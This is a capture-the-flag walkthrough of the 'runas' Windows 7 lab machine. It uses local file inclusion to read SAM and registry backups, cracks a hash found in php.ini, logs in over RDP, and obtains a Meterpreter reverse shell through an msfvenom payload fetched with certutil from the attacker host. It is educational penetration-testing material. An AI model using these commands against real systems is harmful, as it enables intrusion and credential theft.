runas
Information Gathering
Port Scanning
┌──(kali㉿kali)-[~/temp/runas]
└─$ rustscan -a $IP -- -sCV
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.105:139
Open 192.168.10.105:445
Open 192.168.10.105:80
Open 192.168.10.105:135
Open 192.168.10.105:3389
Open 192.168.10.105:5357
Open 192.168.10.105:49153
Open 192.168.10.105:49154
Open 192.168.10.105:49156
Open 192.168.10.105:49157
Open 192.168.10.105:49152
Open 192.168.10.105:49155
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 128 Apache httpd 2.4.57 ((Win64) PHP/7.2.0)
|_http-server-header: Apache/2.4.57 (Win64) PHP/7.2.0
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server? syn-ack ttl 128
|_ssl-date: 2025-06-08T00:07:17+00:00; +5s from scanner time.
| ssl-cert: Subject: commonName=runas-PC
| Issuer: commonName=runas-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-06-07T00:01:50
| Not valid after: 2025-12-07T00:01:50
| MD5: 79d2:2c91:6900:cf44:07c4:be17:ad76:b183
| SHA-1: 2a37:06f2:d351:9e58:d031:f6d4:1d46:7419:11f9:7470
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQbmwyyXTSJoZIeYTVho1hWDANBgkqhkiG9w0BAQUFADAT
| MREwDwYDVQQDEwhydW5hcy1QQzAeFw0yNTA2MDcwMDAxNTBaFw0yNTEyMDcwMDAx
| NTBaMBMxETAPBgNVBAMTCHJ1bmFzLVBDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEAz/9/onOUclAE92QDCErEIK35pXJ/RyJqibUfdZNbttNACY0USk51
| OKqFI0cKOKQsXoc6Grxl7UfVwC9v6ZCoYTWl3YgMUq0auV8WoWluH1YaZ/Oro8LD
| H9RCqE0/Dia8GOcmjkMlpIOA5sewWj4t09Mcs2gf1ALEeZfKgMwgyAwp7zjkOKpr
| aR9mPudZWvcSvB9Cv0i69/hfuixH4InCSsgM86jBXtqlpDD01XkT5u2xgXbd4GOL
| 4PyHdomFahgeyvytPZ8b9RamvNh8xBtHBqKF1Tdur993m6Y/T1k1vficRRuvs4tm
| kKn6YaabmEpjbFd9AiRAqJrnQqsYIZ7ZXwIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAHjb9pGELhjm
| mOKB1ZhxwqGSc9+01mmb8rdS1Va/fkusoogYG4mkurnukDNmUwwKCPsP9XWdQjgA
| gz9K9+/N4hMkhKptzBKAAj+JGcz7BJnSlkLKHnRsDaNAlTIN8r7fIFqLY2hh/VrI
| wFITd2yNOlXryUuBcXyzkdpn0q5QtwWsrcvLri/i7h3Gg4LwdxfKE/YFfG1VPLxH
| dVurHBpA2OYAOoEb3jZRhA/ryLSTV2Q3N437MBC1HTXH40JnVuS9PJuNdR7j4MM9
| SMcpaGij6vIhUU2RAnsZhL25knOEsgPMyzrePAYWYu4ZZP18XlkiyShXibwx9tN8
| ZiLbLHEvkpg=
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: RUNAS-PC
| NetBIOS_Domain_Name: RUNAS-PC
| NetBIOS_Computer_Name: RUNAS-PC
| DNS_Domain_Name: runas-PC
| DNS_Computer_Name: runas-PC
| Product_Version: 6.1.7601
|_ System_Time: 2025-06-08T00:07:12+00:00
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:15:AC:5F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 58509/tcp): CLEAN (Couldn't connect)
| Check 2 (port 48287/tcp): CLEAN (Couldn't connect)
| Check 3 (port 7707/udp): CLEAN (Timeout)
| Check 4 (port 10964/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: RUNAS-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:15:ac:5f (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
| RUNAS-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| RUNAS-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 08:00:27:15:ac:5f:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: runas-PC
| NetBIOS computer name: RUNAS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-06-08T03:07:12+03:00
| smb2-time:
| date: 2025-06-08T00:07:12
|_ start_date: 2025-06-08T00:01:48
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -35m55s, deviation: 1h20m29s, median: 4s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
Directory Scanning
┌──(kali㉿kali)-[~/temp/runas]
└─$ dirsearch -u http://$IP/
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/temp/runas/reports/http_192.168.10.105/__25-06-07_20-18-05.txt
Target: http://192.168.10.105/
[20:18:05] Starting:
[20:18:05] 403 - 199B - /%C0%AE%C0%AE%C0%AF
[20:18:05] 403 - 199B - /%3f/
[20:18:05] 403 - 199B - /%ff
[20:18:08] 403 - 199B - /.ht_wsr.txt
[20:18:08] 403 - 199B - /.htaccess.bak1
[20:18:08] 403 - 199B - /.htaccess.save
[20:18:09] 403 - 199B - /.htaccess.sample
[20:18:09] 403 - 199B - /.htaccess.orig
[20:18:09] 403 - 199B - /.htaccess_orig
[20:18:09] 403 - 199B - /.htaccess_extra
[20:18:09] 403 - 199B - /.htaccess_sc
[20:18:09] 403 - 199B - /.htaccessOLD2
[20:18:09] 403 - 199B - /.htaccessBAK
[20:18:09] 403 - 199B - /.htaccessOLD
[20:18:09] 403 - 199B - /.htm
[20:18:09] 403 - 199B - /.html
[20:18:09] 403 - 199B - /.htpasswd_test
[20:18:09] 403 - 199B - /.htpasswds
[20:18:09] 403 - 199B - /.httr-oauth
[20:18:27] 403 - 199B - /cgi-bin/
[20:18:27] 500 - 530B - /cgi-bin/printenv.pl
[20:18:39] 200 - 414B - /index.php
[20:18:39] 200 - 414B - /index.pHp
[20:18:39] 200 - 414B - /index.php.
[20:18:39] 403 - 199B - /index.php::$DATA
[20:18:39] 200 - 414B - /index.php/login/
[20:19:01] 403 - 199B - /Trace.axd::$DATA
[20:19:04] 403 - 199B - /web.config::$DATA
Task Completed
Vulnerability Discovery
Reconnaissance
┌──(kali㉿kali)-[~/temp/runas]
└─$ curl -s http://$IP/ | html2text
****** Index of / ******
* index.php
* styles.css
Fuzzing the parameter
First check whether the file parameter really includes files:
┌──(kali㉿kali)-[~/temp/runas]
└─$ curl -s "http://$IP/index.php?file=styles.css" | html2text
****** There is no going back! ******
***** ?file= *****
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 0;
}
.container {
max-width: 600px;
margin: 50px auto;
padding: 20px;
background-color: white;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
text-align: center;
}
h1 {
color: #333;
margin-bottom: 20px;
}
form {
margin-bottom: 20px;
}
input[type="text"] {
width: 80%;
padding: 10px;
border: 1px solid #ccc;
border-radius: 4px;
margin-right: 10px;
}
button {
padding: 10px 15px;
background-color: #28a745;
color: white;
border: none;
border-radius: 4px;
cursor: pointer;
}
button:hover {
background-color: #218838;
}
.output {
margin-top: 20px;
text-align: left;
}
So the parameter does include files. The usual ../ traversal payloads got nowhere, so fuzz it with a Windows LFI wordlist instead (absolute paths, as the results show, are accepted as-is):
┌──(kali㉿kali)-[~/temp/runas]
└─$ wfuzz -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "http://$IP/index.php?file=FUZZ" --hw 35
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.10.105/index.php?file=FUZZ
Total requests: 236
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000015: 200 1928 L 12417 W 85387 Ch "C:/php/php.ini"
000000044: 200 38 L 189 W 1375 Ch "C:/WINDOWS/System32/drivers/etc/hosts"
000000045: 200 45 L 96 W 1042 Ch "C:/Windows/win.ini"
000000041: 200 17 L 33 W 425 Ch "C:/Windows/repair/system"
000000040: 200 17 L 33 W 425 Ch "C:/WINDOWS/Repair/SAM"
000000078: 200 1928 L 12417 W 85387 Ch "c:/PHP/php.ini"
000000077: 200 1928 L 12417 W 85387 Ch "c:/php/php.ini"
000000067: 200 820 L 3729 W 79253 Ch "C:/Windows/System32/inetsrv/config/applicationHost.config"
000000064: 200 19 L 50 W 632 Ch "C:/Windows/system32/config/regback/software"
000000066: 200 598 L 2797 W 58608 Ch "C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml"
000000062: 200 19 L 50 W 632 Ch "C:/Windows/system32/config/regback/security"
000000063: 200 19 L 50 W 630 Ch "C:/Windows/system32/config/regback/system"
000000061: 200 19 L 50 W 627 Ch "C:/Windows/system32/config/regback/sam"
000000060: 200 19 L 50 W 631 Ch "C:/Windows/system32/config/regback/default"
000000001: 200 17 L 33 W 425 Ch "C:/Users/Administrator/NTUser.dat"
000000223: 200 302 L 1569 W 19622 Ch "c:/WINDOWS/system32/drivers/etc/services"
000000220: 200 96 L 700 W 4760 Ch "c:/WINDOWS/system32/drivers/etc/lmhosts.sam"
000000222: 200 44 L 232 W 1973 Ch "c:/WINDOWS/system32/drivers/etc/protocol"
000000219: 200 38 L 189 W 1375 Ch "c:/WINDOWS/system32/drivers/etc/hosts"
000000230: 200 17 L 33 W 425 Ch "c:/WINDOWS/setuperr.log"
000000228: 200 313 L 2051 W 25712 Ch "c:/WINDOWS/setupact.log"
000000221: 200 33 L 105 W 946 Ch "c:/WINDOWS/system32/drivers/etc/networks"
000000233: 200 1170 L 13297 W 108051 Ch "c:/WINDOWS/WindowsUpdate.log"
Total time: 0.456759
Processed Requests: 236
Filtered Requests: 213
Requests/sec.: 516.6836
Information Gathering
No exploitation path came to mind at all, so the only option was to go through the readable files one by one. First save the wfuzz results to a file:
┌──(kali㉿kali)-[~/temp/runas]
└─$ wfuzz -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "http://$IP/index.php?file=FUZZ" --hw 35 2>/dev/null > wfuzz.log
Something odd happened here. Looking at wfuzz.log first with bat and then, just for a cleaner view, with cat -A, the two tools show noticeably different things. The file is not missing content; part of it is simply invisible: wfuzz keeps writing ANSI colour codes even when its output is redirected to a file, and cat -A renders them as ^[[0m. I thought I was seeing ghosts, and every regex I tried seemed to match more lines rather than fewer.
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat wfuzz.log | grep -v "35" | grep -oP '"\K[^"]+' > wfuzz.log1
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat -A wfuzz.log1
C:/Users/Administrator/NTUser.dat$
^[[0m$
C:/php/php.ini$
^[[0m$
C:/Windows/win.ini$
^[[0m$
C:/WINDOWS/Repair/SAM$
^[[0m$
C:/Windows/repair/system$
^[[0m$
C:/WINDOWS/System32/drivers/etc/hosts$
^[[0m$
c:/php/php.ini$
^[[0m$
C:/Windows/System32/inetsrv/config/applicationHost.config$
^[[0m$
c:/PHP/php.ini$
^[[0m$
C:/Windows/system32/config/regback/software$
^[[0m$
C:/Windows/system32/config/regback/security$
^[[0m$
C:/Windows/system32/config/regback/sam$
^[[0m$
C:/Windows/system32/config/regback/default$
^[[0m$
C:/Windows/system32/config/regback/system$
^[[0m$
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml$
^[[0m$
c:/WINDOWS/system32/drivers/etc/lmhosts.sam$
^[[0m$
c:/WINDOWS/setuperr.log$
^[[0m$
c:/WINDOWS/WindowsUpdate.log$
^[[0m$
c:/WINDOWS/system32/drivers/etc/services$
^[[0m$
c:/WINDOWS/setupact.log$
^[[0m$
c:/WINDOWS/system32/drivers/etc/hosts$
^[[0m$
c:/WINDOWS/system32/drivers/etc/protocol$
^[[0m$
c:/WINDOWS/system32/drivers/etc/networks$
^[[0m$
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat wfuzz.log1 | sort | tail -n 23 > wfuzz.log2
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat wfuzz.log2
c:/php/php.ini
c:/PHP/php.ini
C:/php/php.ini
C:/Users/Administrator/NTUser.dat
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
c:/WINDOWS/setupact.log
c:/WINDOWS/setuperr.log
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/software
C:/Windows/system32/config/regback/system
c:/WINDOWS/system32/drivers/etc/hosts
C:/WINDOWS/System32/drivers/etc/hosts
c:/WINDOWS/system32/drivers/etc/lmhosts.sam
c:/WINDOWS/system32/drivers/etc/networks
c:/WINDOWS/system32/drivers/etc/protocol
c:/WINDOWS/system32/drivers/etc/services
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
c:/WINDOWS/WindowsUpdate.log
C:/Windows/win.ini
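The filtering trouble above (bat and cat -A disagreeing, a regex that kept matching more lines) comes down to wfuzz leaving ANSI colour codes in the redirected log. As an added example, not part of the original write-up, the following Python post-processes such a log offline: it strips the escapes, drops rows whose word count equals the --hw baseline, merges paths that differ only in case (the three spellings of php.ini above are one file on a case-insensitive Windows filesystem, so it was fetched three times for nothing), and flags unrelated files that came back with identical sizes, such as NTUser.dat and Repair/SAM at 17 L / 33 W / 425 Ch, which is more likely a PHP warning for a locked file than the file itself. The sample log is constructed to mirror the run above.

```python
"""Post-process a redirected wfuzz log (added example; not from the write-up).

wfuzz keeps emitting ANSI colour codes when stdout is redirected, which is what
cat -A showed as ^[[0m. This strips them, drops rows at the --hw baseline,
collapses Windows paths that differ only in case or slash direction, and flags
distinct files that returned byte-identical response shapes.
"""
import re

# CSI escape sequences such as ESC[0m or ESC[1;31m
ANSI_RE = re.compile(r"\x1b\[[0-9;]*[A-Za-z]")

# One wfuzz result row, e.g.
#   000000015:   200        1928 L   12417 W    85387 Ch    "C:/php/php.ini"
ROW_RE = re.compile(
    r'^\s*(?P<id>\d+):\s+(?P<status>\d{3})\s+(?P<lines>\d+) L\s+'
    r'(?P<words>\d+) W\s+(?P<chars>\d+) Ch\s+"(?P<payload>[^"]*)"'
)

# Constructed sample modelled on the log above, including the colour codes a
# redirected run leaves behind. Row 2 is a baseline-sized (35 W) response that
# --hw 35 would have hidden on a terminal.
SAMPLE_LOG = "\n".join([
    "\x1b[1mTarget: http://192.168.10.105/index.php?file=FUZZ\x1b[0m",
    "Total requests: 236",
    "ID           Response   Lines    Word       Chars       Payload",
    '\x1b[0m000000001:\x1b[0m   200        17 L     33 W       425 Ch      "C:/Users/Administrator/NTUser.dat"',
    "\x1b[0m",
    '000000002:   200        3 L      35 W       414 Ch      "C:/does/not/exist.txt"',
    "\x1b[0m",
    '000000015:   200        1928 L   12417 W    85387 Ch    "C:/php/php.ini"',
    "\x1b[0m",
    '000000040:   200        17 L     33 W       425 Ch      "C:/WINDOWS/Repair/SAM"',
    "\x1b[0m",
    '000000077:   200        1928 L   12417 W    85387 Ch    "c:/php/php.ini"',
    "\x1b[0m",
    '000000078:   200        1928 L   12417 W    85387 Ch    "c:/PHP/php.ini"',
    "\x1b[0m",
    '000000045:   200        45 L     96 W       1042 Ch     "C:/Windows/win.ini"',
    "\x1b[0m",
    "Total time: 0.456759",
])


def strip_ansi(text: str) -> str:
    """Remove terminal colour/reset sequences so line-oriented tools see clean text."""
    return ANSI_RE.sub("", text)


def _canon(path: str) -> str:
    """Canonical form of a Windows path: forward slashes, lower case."""
    return path.replace("\\", "/").lower()


def parse_wfuzz_log(text: str, baseline_words: int = 35) -> list:
    """Return result rows whose word count differs from the baseline.

    Each row is a dict with status, lines, words, chars and payload. Header,
    footer and bare colour-reset lines do not match ROW_RE and are skipped.
    """
    hits = []
    for line in strip_ansi(text).splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        row = {k: int(m[k]) for k in ("status", "lines", "words", "chars")}
        row["payload"] = m["payload"]
        if row["words"] != baseline_words:
            hits.append(row)
    return hits


def unique_windows_paths(hits: list) -> list:
    """Collapse payloads naming the same file on a case-insensitive filesystem."""
    first_seen = {}
    for h in hits:
        first_seen.setdefault(_canon(h["payload"]), h["payload"])
    return sorted(first_seen.values(), key=str.lower)


def repeated_signatures(hits: list) -> dict:
    """Map (lines, words, chars) to the distinct files that share that exact shape.

    Unrelated files with identical response sizes are usually an error or
    warning page rather than content and should be read by hand first.
    """
    groups = {}
    for h in hits:
        sig = (h["lines"], h["words"], h["chars"])
        groups.setdefault(sig, set()).add(_canon(h["payload"]))
    return {sig: sorted(paths) for sig, paths in groups.items() if len(paths) > 1}


if __name__ == "__main__":
    rows = parse_wfuzz_log(SAMPLE_LOG)
    for path in unique_windows_paths(rows):
        print(path)
    for sig, paths in repeated_signatures(rows).items():
        print("identical response shape", sig, "for", paths)
```

Feeding the real log in place of SAMPLE_LOG gives the de-duplicated fetch list directly, without the grep -v / sort / tail chain.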
Pull each file and see what is inside (note that grep -v "35" above drops any line containing the digits 35 anywhere, not just the 35-word baseline rows; it happened to be harmless here, since all 23 hits survived):
┌──(kali㉿kali)-[~/temp/runas]
└─$ while IFS= read -r filename; do echo "[+] Visited: \"$filename\""; echo "[+] Current file: \"$filename\"" >> results.log; curl -s "http://192.168.10.105/index.php?file=$filename" | html2text >> results.log; echo "" >> results.log; done < wfuzz.log2
[+] Visited: "c:/php/php.ini"
[+] Visited: "c:/PHP/php.ini"
[+] Visited: "C:/php/php.ini"
[+] Visited: "C:/Users/Administrator/NTUser.dat"
[+] Visited: "C:/WINDOWS/Repair/SAM"
[+] Visited: "C:/Windows/repair/system"
[+] Visited: "c:/WINDOWS/setupact.log"
[+] Visited: "c:/WINDOWS/setuperr.log"
[+] Visited: "C:/Windows/system32/config/regback/default"
[+] Visited: "C:/Windows/system32/config/regback/sam"
[+] Visited: "C:/Windows/system32/config/regback/security"
[+] Visited: "C:/Windows/system32/config/regback/software"
[+] Visited: "C:/Windows/system32/config/regback/system"
[+] Visited: "c:/WINDOWS/system32/drivers/etc/hosts"
[+] Visited: "C:/WINDOWS/System32/drivers/etc/hosts"
[+] Visited: "c:/WINDOWS/system32/drivers/etc/lmhosts.sam"
[+] Visited: "c:/WINDOWS/system32/drivers/etc/networks"
[+] Visited: "c:/WINDOWS/system32/drivers/etc/protocol"
[+] Visited: "c:/WINDOWS/system32/drivers/etc/services"
[+] Visited: "C:/Windows/System32/inetsrv/config/applicationHost.config"
[+] Visited: "C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml"
[+] Visited: "c:/WINDOWS/WindowsUpdate.log"
[+] Visited: "C:/Windows/win.ini"
┌──(kali㉿kali)-[~/temp/runas]
└─$ cat results.log | grep runas
process as runas-PC\Administrator in session 2
process as runas-PC\Administrator in session 2
process as runas-PC\Administrator in session 1
process as runas-PC\Administrator in session 1
; MD5-runas-b3a805b2594befb6c846d718d1224557
A hash labelled MD5-runas-... turned up in an ini comment (the leading ; is the ini comment marker). Try to crack it:
┌──(kali㉿kali)-[~/temp/runas]
└─$ hash-identifier
Hash Identifier v1.2 by Zion3R (www.Blackploit.com)
--------------------------------------------------
HASH: b3a805b2594befb6c846d718d1224557
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
Remote Login
Cracking it gives the credential runas:yakuzza. SSH is not an option since port 22 is closed, but the target has 3389 open, so log in over Remote Desktop with Win+R, then mstsc:
The RDP login succeeds. Next, get a shell back: first generate a payload locally:
┌──(kali㉿kali)-[~/temp/runas]
└─$ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.103 lport=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
┌──(kali㉿kali)-[~/temp/runas]
└─$ updog -p 8888
[+] Serving /home/kali/temp/runas...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:8888
* Running on http://192.168.10.103:8888
Press CTRL+C to quit
Then set up the listener in another window:
┌──(kali㉿kali)-[~/temp/runas]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set lhost 192.168.10.103
lhost => 192.168.10.103
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.10.103:4444
Default port this time. Then, in the remote desktop, open cmd and download the payload. Switch the input language to English first (the system is Turkish), then:
certutil -urlcache -split -f http://192.168.10.103:8888/shell.exe
The download succeeds, and the request shows up in the updog log locally as well. Run shell.exe and the session comes back to the handler:
Privilege Escalation
Information Gathering
meterpreter > shell
Process 2448 created.
Channel 1 created.
Microsoft Windows [Sürüm 6.1.7601]
Telif Hakkı (c) 2009 Microsoft Corporation. Tüm hakları saklıdır.
C:\Users\runas>whoami
whoami
runas-pc\runas
C:\Users\runas>dir
dir
C sürücüsündeki birimin etiketi yok.
Birim Seri Numarası: 542C-C630
C:\Users\runas dizini
08.06.2025 05:02 <DIR> .
08.06.2025 05:02 <DIR> ..
06.10.2024 21:38 <DIR> Contacts
09.10.2024 18:24 <DIR> Desktop
06.10.2024 21:38 <DIR> Documents
06.10.2024 21:38 <DIR> Downloads
06.10.2024 21:38 <DIR> Favorites
06.10.2024 21:38 <DIR> Links
06.10.2024 21:38 <DIR> Music
06.10.2024 21:38 <DIR> Pictures
06.10.2024 21:38 <DIR> Saved Games
06.10.2024 21:38 <DIR> Searches
08.06.2025 05:02 73.802 shell.exe
06.10.2024 21:38 <DIR> Videos
1 Dosya 73.802 bayt
13 Dizin 21.675.307.008 bayt boş
C:\Users\runas>cd Desktop
cd Desktop
C:\Users\runas\Desktop>dir
dir
C sürücüsündeki birimin etiketi yok.
Birim Seri Numarası: 542C-C630
C:\Users\runas\Desktop dizini
09.10.2024 18:24 <DIR> .
09.10.2024 18:24 <DIR> ..
08.10.2024 17:07 31 user.txt
1 Dosya 31 bayt
2 Dizin 21.675.307.008 bayt boş
C:\Users\runas\Desktop>type user.txt
type user.txt
HMV{User_Flag_Was_A_Bit_Bitter}
C:\Users\runas\Desktop>^Z
Background channel 1? [y/N] y
meterpreter > getuid
Server username: runas-PC\runas
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.10.1 10 11
127.0.0.0 255.0.0.0 127.0.0.1 306 1
127.0.0.1 255.255.255.255 127.0.0.1 306 1
127.255.255.255 255.255.255.255 127.0.0.1 306 1
192.168.10.0 255.255.255.0 192.168.10.105 266 11
192.168.10.105 255.255.255.255 192.168.10.105 266 11
192.168.10.255 255.255.255.255 192.168.10.105 266 11
224.0.0.0 240.0.0.0 127.0.0.1 306 1
224.0.0.0 240.0.0.0 192.168.10.105 266 11
255.255.255.255 255.255.255.255 127.0.0.1 306 1
255.255.255.255 255.255.255.255 192.168.10.105 266 11
IPv6 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
:: ffff:ffff:: fe80::4e10:d5ff:fe0a:f900 266 11
::1 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 1
fd00:4c10:d50a:f900:: ffff:ffff:ffff:ffff:ffff:ffff:: :: 18 11
fd00:4c10:d50a:f900::1002 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 11
fd00:4c10:d50a:f900:65b5:ae9f:d9e6:7e7a ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 11
fd00:4c10:d50a:f900:e4d0:6fc2:8968:4806 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 11
fe80:: ffff:ffff:ffff:ffff:ffff:ffff:: :: 266 11
fe80::5efe:c0a8:a69 ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 12
fe80::65b5:ae9f:d9e6:7e7a ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff :: 266 11
ff00:: ff00:: :: 266 1
ff00:: ff00:: :: 266 11
meterpreter > systeminfo
[-] Unknown command: systeminfo. Did you mean sysinfo? Run the help command for more details.
meterpreter > sysinfo
Computer : RUNAS-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : tr_TR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > pwd
C:\Users\runas
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows runas-PC\runas @ RUNAS-PC 192.168.10.103:4444 -> 192.168.10.105:49161 (192.168.10.105)
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.10.105 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.
You can add syslog to your Gemfile or gemspec to silence this warning.
Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
[*] 192.168.10.105 - 203 exploit checks are being tried...
